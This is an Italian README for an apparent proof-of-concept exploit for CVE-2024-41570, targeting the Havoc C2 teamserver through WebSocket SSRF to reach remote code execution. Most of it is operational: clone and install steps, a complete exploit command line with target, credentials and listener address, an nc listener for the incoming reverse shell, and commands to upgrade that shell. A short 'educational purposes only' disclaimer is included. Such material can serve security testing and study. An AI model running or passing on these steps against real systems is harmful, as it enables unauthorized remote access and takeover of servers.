
Exploit automatizzato di reverse shell tramite WebSocket | Havoc-C2-SSRF con RCE
Questo progetto fornisce uno script proof-of-concept (PoC) basato su Python per sfruttare un servizio vulnerabile basato su WebSocket. Lo script automatizza la registrazione dell'agente, la consegna del payload WebSocket e l'esecuzione remota dei comandi per stabilire una reverse shell.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Esegui lo script con gli argomenti richiesti:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: URL di destinazione del server WebSocket.-i: Indirizzo IP del Team Server di Havoc.-p: Porta del Team Server di Havoc.-U: Nome utente per l'autenticazione WebSocket.-P: Password per l'autenticazione WebSocket.-l: IP del listener per la reverse shell (la tua macchina).-L: Porta del listener per la reverse shell (la tua macchina).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
Lo script richiede le seguenti librerie Python:
requestspycryptodomeInstallale usando il comando:
pip install -r requirements.txt
Questo script è destinato esclusivamente a scopi educativi. Assicurati di avere un'autorizzazione esplicita per testare il sistema di destinazione. L'uso improprio di questo script può violare leggi e linee guida etiche.
Ispirato da Default Havoc Poc
I contributi sono benvenuti! Sentiti libero di fare il fork del repository e inviare una pull request.
Questo progetto è concesso in licenza sotto la MIT License. Vedi il file LICENSE per i dettagli.